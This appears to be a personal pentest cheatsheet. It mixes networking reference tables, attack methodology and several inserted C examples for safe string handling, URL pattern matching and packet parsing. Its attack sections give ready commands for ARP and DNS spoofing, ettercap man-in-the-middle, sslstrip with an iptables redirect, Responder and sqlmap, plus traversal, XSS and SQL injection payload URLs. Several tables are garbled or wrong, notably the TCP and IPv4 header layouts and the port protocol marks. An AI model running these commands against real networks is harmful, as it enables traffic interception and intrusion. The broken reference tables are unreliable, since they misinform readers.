
Jan 26, 2018

updated at: May 28, 2019

Pentest Cheatsheet

Accounts

Make (fake) accounts for:

Basics

Networking

IEEE 802:

| Type | Meaning |
|------|---------|
| 802.3 | Ethernet |
| 802.8 | FiberOptic |
| 802.11 | Wifi |
| 802.15.1 | Bluetooth |
| 802.16 | WiMax |

IEEE 802.11:

| Type | Distance | Speed | Freq |
|------|----------|-------|------|
| 802.11a | 30M | 54Mbps | 5Ghz |
| 802.11b | 100M | 11Mbps | 2.4Ghz |
| 802.11g | 100M | 54Mbps | 2.4Ghz |
| 802.11n | 125M | 600Mbps | 5Ghz |

802.11i is a rewrite of WEP called WPA/TKIP.

Wireless security:

TCP 3-way handshake:

----SYN----> 
<--SYNACK---
----ACK---->

DHCP:

Discover --->
<--- Offer
Request --->
<-- Acknowledge

IPv4 class ranges:

| Type | Begin | End |
|------|-------|-----|
| A | 0.0.0.0 | 127.255.255.255 |
| B | 128.0.0.0 | 191.255.255.255 |
| C | 192.0.0.0 | 223.255.255.255 |
| D | 224.0.0.0 | 239.255.255.255 |
| E | 240.0.0.0 | 255.255.255.255 |

Well-known ports

| Port | Function | TCP | UDP |
|------|----------|-----|-----|
| 1 | ICMP | | |
| 6 | TCP | X | |
| 17 | UDP | | X |
| 20 | FTP | X | |
| 21 | FTP-login | X | |
| 22 | SSH | X | X |
| 23 | Telnet | X | |
| 25 | SMTP | X | |
| 50 | AH | | |
| 51 | ESP | | |
| 53 | DNS | X | X |
| 80 | HTTP | X | X |
| 88 | Kerberos | | |
| 110 | POP3 | X | X |
| 119 | NNTP | X | |
| 139 | netBIOS | X | X |
| 143 | IMAP | X | X |
| 161 | SNMP | X | X |
| 389 | LDAP | X | X |
| 443 | HTTPS | X | X |
| 465 | SMTPS | X | |
| 514 | Remote shell | X | |
| 636 | LDAPS | X | X |
| 993 | IMAPS | X | X |
| 995 | POP3S | X | X |
| 1080 | SOCKS | | |
| 3389 | RDP | | |
| 6667 | IRC | | |

Note: the entries 1, 6, 17, 50 and 51 are IP protocol numbers (ICMP, TCP, UDP, AH, ESP) rather than TCP/UDP port numbers.

Models

| OSI | TCP/IP | Protocols | PDU |
|-----|--------|-----------|-----|
| Application | Application | HTTP, FTP, POP, SMTP, DNS, RIP | Data |
| Presentation | Application | HTTP, FTP, POP, SMTP, DNS, RIP | Data |
| Session | Application | HTTP, FTP, POP, SMTP, DNS, RIP | Data |
| Transport | Transport | TCP, UDP | Segment |
| Network | Internet | IP, ARP, ICMP, IGMP | Packets |
| Data Link | Link | Ethernet | Frames |
| Physical | Link | Token ring | Bits |

Encryption

Symmetric

Algorithm
DES
3DES
AES
IDEA
RC2,4,6
Blowfish

NOTE: RC4 is a stream cipher

Asymmetric

Algorithm
RSA
DSA
ECC
ElGamal

Hashing

MD5, SHA-1, RIPEMD, bcrypt

CIA (Confidentiality, Integrity, Authentication)

| Confidentiality | Integrity | Authentication |
|-----------------|-----------|----------------|
| DES | MD5 | PSK |
| 3DES | SHA | RSA / DSA |
| AES | HMAC-MD5 | |
| SEAL | HMAC-SHA | |

Terms and Definitions

HTTP and URLs

HTTP Error Codes

Percent encoding:

| ASCII | Web encoded |
|-------|-------------|
| / | %2F |
| . | %2E |
| < | %3C |
| > | %3E |
| space | %20 |
| newline | %0A or %0D or %0D%0A |

Legal issues

United States

Europe

Physical security

Security Controls

types:

In depth types:

Pentest methodologies

Phases example:

  1. Reconnaissance - Information gathering, physical and social engineering, locate network range
  2. Scanning - Enumerating live hosts, access points, accounts and policies, vulnerability assessment
  3. Gaining Access - Breach systems, plant malicious code, backdoors
  4. Maintaining Access - Rootkits, unpatched systems
  5. Clearing Tracks - IDS evasion, log manipulation, decoy traffic
  6. Reporting

Information gathering:

  1. Unearth initial information - What/who is the target?
  2. Locate the network range - What is the attack surface?
  3. Ascertain active machines - What hosts are alive?
  4. Open ports / access points - How can they be accessed?
  5. Detect operating systems - What platform are they?
  6. Uncover services on ports - What software can be attacked?

PTES standard:

  1. Pre-engagement.
  2. Intelligence gathering.
  3. Threat modeling.
  4. Vulnerability analysis.
  5. Exploitation
  6. Post exploitation.
  7. Reporting.

Information gathering

In this phase it is important to use all the information gathered to build a custom password list.

Social Engineering

Social engineering is the most powerful attack vector in this phase; you can use SET (the Social-Engineer Toolkit).

Spoof everything you can, without being seen.

Domain name service

# whois <site.com>
# nslookup <cr>
> set type=mx
> <site.com>
# dig <site.com> any
# host -t ns <site.com>
# host -l <site.com> <nameserver>
# host -t AXFR <site.com> <nameserver>
# fierce -dns <site.com>

Attack:

Internet registry:

Google Hacking

| Keyword | Meaning |
|---------|---------|
| site | Search only within a domain |
| ext | File extension |
| loc | Maps location |
| intitle | Keywords in the title tag of the page |
| allintitle | Any of the keywords can be in the title |
| inurl | Keywords anywhere in the URL |
| allinurl | Any of the keywords can be in the URL |
| incache | Search Google cache only |

Examples:

site:intenseschool.com (ceh ecsa lpt)
intitle:index.of
allinurl:login logon

Discovery Scans

Open web information gathering

Emails

# theharvester -d sevaho.io -l 500 -b all

Printers

Look out for multi-purpose printers; they can be a golden ticket to the throne room!

Application scans

Metasploit quickstart:

# use <exploit>
# show options
# info <exploit>
# run or exploit

Port scanning

TCP:

# unicornscan -i <interface> -I -mT $IP:a

UDP:

# unicornscan -i <interface> -I -mU $IP:a

Nmap scripts:

# nmap --script "safe and exploit" 192.168.0.2

See https://sevaho.io/docs/CheatSheets/Nmap%20and%20Tcpdump.md

Sniff the network

See the appendix for information about protocols

arpspoof

# arpspoof -i eth0 -t <ip> <ip2> # -t : target, tell ip that we are ip2

We need to do this in both directions, otherwise you will cause a DoS instead of a transparent intercept.

# arpspoof -i eth0 -t <ip2> <ip>

NOTE: Make sure the kernel forwards traffic, otherwise the spoofed hosts lose connectivity; check with: cat /proc/sys/net/ipv4/ip_forward (1 = enabled)

Example:

The target is 192.168.1.80 and you want to capture all its data to the gateway.

# arpspoof -i eth0 -t 192.168.1.80 192.168.1.1
# arpspoof -i eth0 -t 192.168.1.1 192.168.1.80

dnsspoof

Make a file:

127.0.0.1 www.google.com
# dnsspoof -i eth0 -f <txtfile>

To make the localhost look like another website you can use SET or HTTrack.

Cookie sniffer

Ettercap

# ettercap -Ti eth0 -M arp:remote /192.168.1.1/ /192.168.1.5/ # -M : MITM method
# ettercap -TqM arp:remote /192.168.1.1/ /192.168.1.5/

SSL stripping

This sets up a MITM between a website and your target. The target receives the site over plain HTTP; you log the user in over HTTPS towards the real site and relay the responses back over HTTP.

First we'll redirect traffic from port 80 to 8080:

# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
# sslstrip -l 8080

Responder

Listens for LLMNR and NBT-NS and acts on them.

# responder -i <ip> -b Off -r Off -w On

Web application scanning

SQL mapping

# sqlmap --wizard
# sqlmap -u <site.com> --data="users=test&pass=pass" -b

Exploiting

Wireless attacks

Use a good antenna.

Attacks:

Web

Vulnerability exploiting: xss, csrf and session tokens.

XSS

Embed hook.js (BeEF) on the site and try to make another user go to your embedded site, e.g. via social engineering.

Reverse shell

Windows

Physical Attacks

Password Cracking

Types:

Rainbow tables

"Time / Memory Trade off" Less memory than a lookup, less computing than a brute force. Salting the hash is a way to combat rainbow tables.

Trojans

Detect trojans:

Phases:

Infection -> Spreading -> Attack

Viruses

Lifecycle:

Design -> Replication -> Launch -> Detection -> Incorporation -> Elimination

Types of viruses

Famous viruses

DoS and DDoS

Types:

Denial of Services and Distributed Denial of Service attacks are embarrassing and inconvenient. They are extremely difficult to prevent from being attempted. The best defense is a well designed network that is hard to overwhelm.

DOS Tools

DDos tools

Buffer Overflows

Terms:

The following C functions are dangerous because they do not check the size of the destination buffer:

gets()
strcpy()
strcat()
printf()

The C++ >> stream operator, when reading into a fixed-size char array, is dangerous for the same reason.
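Added example (not from the cheatsheet): the unchecked copy from the list above next to bounded replacements that refuse input which would not fit. NAME_MAX, greet_unsafe, bounded_copy, bounded_cat and greet_safe are names chosen here.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Added example, not from the cheatsheet: the unchecked calls from the list above
 * next to bounded replacements that refuse input which would not fit. */

#define NAME_MAX 16

/* UNSAFE: strcpy/strcat never consult the destination size. Any `user` of 15 or
 * more bytes overruns `name` on the stack once the "!" is appended. Kept for
 * contrast only; never call it with untrusted input. (gets() has the same flaw;
 * use fgets() with a size instead.) */
void greet_unsafe(const char *user) {
    char name[NAME_MAX];
    strcpy(name, user);   /* overflow if strlen(user) >= NAME_MAX */
    strcat(name, "!");    /* another unchecked write */
    printf("hello %s\n", name);
}

/* SAFE copy: fail explicitly instead of truncating silently or overflowing.
 * Returns 0 on success, -1 when src plus its terminator would not fit. */
int bounded_copy(char *dst, size_t dstsize, const char *src) {
    size_t n = strlen(src);
    if (dstsize == 0 || n >= dstsize) return -1;
    memcpy(dst, src, n + 1);   /* n + 1 copies the NUL as well */
    return 0;
}

/* SAFE append with the same explicit check against the remaining room. */
int bounded_cat(char *dst, size_t dstsize, const char *src) {
    size_t used = strlen(dst), n = strlen(src);
    if (used >= dstsize || n >= dstsize - used) return -1;
    memcpy(dst + used, src, n + 1);
    return 0;
}

/* snprintf is the bounded replacement for sprintf; its return value is the
 * length the full output *would* have, so a value >= outsize means truncation. */
int greet_safe(char *out, size_t outsize, const char *user) {
    int need = snprintf(out, outsize, "hello %s!", user);
    return (need < 0 || (size_t)need >= outsize) ? -1 : 0;
}
```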

A buffer overflow attempt (NOP sled):

Apr 5 02:02:09 [3432] : nops: 62.32.54.123:3211 -> 192.168.3.4:135
0x90/0x90/0x90/0x90/0x90/0x90/0x90/0x90/0x90/

Firewalls and IPTables

Types of firewalls

Iptables

There are several default tables for a forwarding firewall to be aware of:

Examples:

# iptables -A FORWARD -j ACCEPT -p tcp --dport 80
# iptables -A FORWARD -p tcp -s 0/0 -d x.y.z.m/32 --destination-port 25 --syn -j ACCEPT
# iptables -A FORWARD -p tcp -s 0/0 -d x.y.z.w/32 --destination-port 80 --syn -j ACCEPT
# iptables -A FORWARD -p tcp -s 0/0 -d x.y.z.w/32 --destination-port 443 --syn -j ACCEPT
# iptables -A FORWARD -p tcp -s 0/0 -d 0/0 --destination-port 22 --syn -j ACCEPT

IDS and Snort

Types

Evasion techniques

Snort rule syntax:

action protocol address port -> | <> address port (option:value; option:value;)
# snort -dve -c ./rules.local -l .

Example rules:

# the simplest rule
alert tcp any any -> any any (msg:"Sample alert"; sid:1000000;)

# detecting a simple signature (|5c 50 49 50 45| is the byte string "\PIPE")
alert tcp 192.168.1.6 any -> 192.168.1.5 139 \
(msg:"Possible SMBDie Attempt"; content:"|5c 50 49 50 45|"; sid:1000000;)

# dynamic rules (may be phased out in favor of a new method called "tagging")
activate tcp any any -> any 21 (content:"Login"; activates:1; sid:1000000;)
dynamic tcp any any -> any 21 (activated_by: 1; count:100;)

Syntax Recognition

Directory traversal:

http://www.example.com/scripts/../../../../winnt/system32/cmd.exe?c+dir+c:

XSS:

http://www.example.com/pages/form.asp?foo=%3Cscript%3Ealert("Hacked")%3C/script%3Elang=

SQL injection:

http://www.example.com/pages/form.asp?foo=blah'+or+1+=+1+--
http://www.example.com/pages/form.asp?foo=%27%3B+insert+into+usertable+("something")%3B+--lang=
blah' or 1 = 1 --
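Added example (not from the cheatsheet) tying the percent-encoding table earlier on the page to the recognition examples in this section: a %XX decoder plus a case-insensitive match of the decoded URL against a small constructed pattern list. percent_decode, match_pattern and the pattern strings are assumptions made here.

```c
#include <string.h>
#include <ctype.h>
#include <stddef.h>

/* Added example, not from the cheatsheet. Decodes %XX escapes ('+' as a space, as
 * in query strings) so the encoded XSS / SQL injection URLs above can be matched
 * against their plain-text forms. The pattern list below is constructed. */

static int hexval(int c) {
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* Writes the decoded string (NUL-terminated, at most outsize-1 bytes) and returns
 * its length. Malformed or truncated %-sequences are kept literally, not dropped. */
size_t percent_decode(const char *in, char *out, size_t outsize) {
    size_t o = 0;
    for (size_t i = 0; in[i] && o + 1 < outsize; i++) {
        int hi, lo;
        if (in[i] == '%' && (hi = hexval((unsigned char)in[i + 1])) >= 0
                         && (lo = hexval((unsigned char)in[i + 2])) >= 0) {
            out[o++] = (char)(hi * 16 + lo);
            i += 2;                      /* consumed the two hex digits */
        } else if (in[i] == '+') {
            out[o++] = ' ';
        } else {
            out[o++] = in[i];
        }
    }
    out[o] = '\0';
    return o;
}

/* Recognition patterns from this section (constructed list), matched
 * case-insensitively on the decoded text. Returns the first hit, or NULL. */
static const char *patterns[] = { "<script", "' or 1 = 1", "../../", NULL };

const char *match_pattern(const char *url) {
    char buf[512], low[512];
    size_t n = percent_decode(url, buf, sizeof buf);
    for (size_t i = 0; i <= n; i++) low[i] = (char)tolower((unsigned char)buf[i]);
    for (int p = 0; patterns[p]; p++)
        if (strstr(low, patterns[p])) return patterns[p];
    return NULL;
}
```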

Buffer overflow:

Apr 5 02:02:09 [3432] : nops: 62.32.54.123:3211 -> 192.168.3.4:135
0x90/0x90/0x90/0x90/0x90/0x90/0x90/0x90/0x90/

Zone transfer:

Apr 5 02:02:09 [3432] : AXFR: 143.32.4.129:4865 -> 192.168.3.4:53

Enumerate emails:

Apr 5 02:02:09 [3432] : VRFY: 78.34.65.45:5674 -> 192.168.3.4:25

Snort:

alert tcp any any -> any any (msg:"Test Rule"; sid:1000000;)

Iptables:

iptables -A FORWARD -j ACCEPT -p udp --dport 53

Capture filter:

host 192.168.1.1 and host 192.168.1.2 and ip proto 1

Display filter:

ip.addr == 192.168.1.1 && tcp.flags == 0x29 (0x29 = FIN, PSH and URG set: an Xmas scan)

Appendix

MAC Addresses

A Media Access Control address is 48 bits; the first 3 bytes of the MAC are a vendor code (the OUI), the other three bytes are arbitrarily assigned by the vendor.

A broadcast MAC address is:

FF:FF:FF:FF:FF:FF

Addresses can be assigned in two ways:

The two least significant bits of the first byte in the OUI address:

nnnnnn0n = Universally administered address
nnnnnn1n = Administratively assigned
nnnnnnn0 = Unicast traffic
nnnnnnn1 = Multicast traffic

                                              ARP
                                             /
                                            /          ICMP
                                           /          /
Networkcard Driver ------> Ethernet Frame-------IPv4-- TCP
                                           \          \
                                            \          UDP
                                             \
                                              IPv6

The simplest protocol on the network is the Ethernet II frame: it is the low-level communication between the networking chips and consists of the blocks source address, destination address, EtherType, data and CRC. If the EtherType equals 0x0806 the frame goes to the ARP handler, if it is 0x0800 it goes to the IPv4 handler, and if it is 0x86DD it goes to the IPv6 handler.

| 6B | 6B | 2B | | 4B |
|----|----|----|------|-----|
| DA | SA | ET | DATA | CRC |

Internet Protocol

Internet protocol is responsible for packaging datagrams for delivery between networks. It is a "best effort" protocol with no error control or correction. For more information read RFC 791.

Internet Protocol Header

The IPv4 packet sits in the data part of the Ethernet frame. It has its own header, which carries (among other fields) a header checksum, the source address and the destination address. If the protocol number equals 1 the payload goes to ICMP, if it equals 6 it goes to TCP, and if it is 17 it goes to UDP.

| 1B | 1B | 2B | 2B | 2B | 1B | 1B | 2B | 4B | 4B |
|----|----|----|----|----|----|----|----|----|----|
| V & L | TOS | LM | ID | F&F | TTL | PN | CRC | DA | SA |

V: version
L: length of header
TOS: type of service
LM: length of the full message
F&F: flags and fragment offset
PN: protocol number
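Added example, not part of the cheatsheet, serving both the Ethernet frame description and the IPv4 header description above: it reads the EtherType from a constructed frame, parses the IPv4 header and dispatches on the protocol number. On the wire the IPv4 source address precedes the destination address (RFC 791), and that is the order the parser uses; ether_type, parse_ipv4, l4_name and sample_frame are names chosen here.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Added example, not from the cheatsheet. Walks a raw Ethernet II frame as the text
 * describes: read the EtherType, hand 0x0800 to an IPv4 parser, then dispatch on the
 * protocol number (1 = ICMP, 6 = TCP, 17 = UDP). Field order follows RFC 791. */

enum { ET_IPV4 = 0x0800, ET_ARP = 0x0806, ET_IPV6 = 0x86DD };
struct ipv4_info {
    int version, ihl_bytes, total_len, ttl, proto;
    uint8_t src[4], dst[4];            /* source address comes first on the wire */
};
static uint16_t rd16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* Returns the EtherType, or -1 when the frame is too short to carry one. */
int ether_type(const uint8_t *frame, size_t len) {
    if (len < 14) return -1;           /* DA(6) + SA(6) + ET(2) */
    return rd16(frame + 12);
}

/* Parses the IPv4 header in the Ethernet payload. 0 on success, -1 if not sane. */
int parse_ipv4(const uint8_t *frame, size_t len, struct ipv4_info *out) {
    if (ether_type(frame, len) != ET_IPV4) return -1;
    const uint8_t *ip = frame + 14;
    size_t avail = len - 14;
    if (avail < 20) return -1;         /* minimum IPv4 header */
    out->version   = ip[0] >> 4;
    out->ihl_bytes = (ip[0] & 0x0F) * 4;   /* IHL counts 32-bit words */
    if (out->version != 4 || out->ihl_bytes < 20 || (size_t)out->ihl_bytes > avail)
        return -1;
    out->total_len = rd16(ip + 2);
    out->ttl       = ip[8];
    out->proto     = ip[9];
    memcpy(out->src, ip + 12, 4);
    memcpy(out->dst, ip + 16, 4);
    return 0;
}

/* The dispatch rule from the text, as a name for a log line or a switch. */
const char *l4_name(int proto) {
    return proto == 1 ? "ICMP" : proto == 6 ? "TCP" : proto == 17 ? "UDP" : "other";
}

/* Constructed sample: Ethernet II frame (EtherType 0x0800) carrying a 20-byte IPv4
 * header, TTL 64, protocol 6, 192.168.1.80 -> 192.168.1.1, no payload. */
const uint8_t sample_frame[] = {
    0x00,0x11,0x22,0x33,0x44,0x55, 0x66,0x77,0x88,0x99,0xaa,0xbb, 0x08,0x00, /* DA, SA, ET */
    0x45,0x00, 0x00,0x14, 0x00,0x01, 0x40,0x00, 0x40,0x06, 0x00,0x00,        /* V&L .. CRC */
    192,168,1,80, 192,168,1,1 };                                             /* SA, DA */
const size_t sample_frame_len = sizeof sample_frame;
```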

Internet Control Message Protocol

ICMP is a transport protocol that creates message datagrams that can be exchanged by network hosts for troubleshooting, error reporting, and information. For more information read RFC 792. For a complete list of types and codes visit http://www.spirit.com/Resources/icmp.html.

ICMP Header Example:

| 1B | 1B | 2B | 4B |
|----|----|----|------|
| T | C | CH | DATA |

T: type
C: code
CH: checksum

Type Code Description:

User Datagram Protocol

User Datagram Protocol is a simple, fast transport protocol that is used for its low overhead in situations where error correction and flow control are not needed, such as short bursts of messages. UDP is difficult to firewall off effectively because it is stateless. For more information read RFC 768.

User Datagram Protocol Header

| 2B | 2B | 2B | 2B |
|----|----|--------|----|
| SA | DA | Length | CH |

Transmission Control Protocol

TCP provides guaranteed transport and flow control of layer 5-7 messages. Along with IP, ICMP, and UDP, a good solid understanding of this protocol is critical for understanding: Scanning, Firewalls, Intrusion Detection, and various types of DoS attacks. For more information read RFC 793.

Transmission Control Protocol Header

| 4B | 4B | 2B | 2B | 2B | 4B | 4B | 4B | 2B | 2B |
|------|-----|----|----|-----|-----|-----|-----|----|----|
| DATA | OPT | U | CH | F&F | TTL | ACK | SEQ | DP | SP |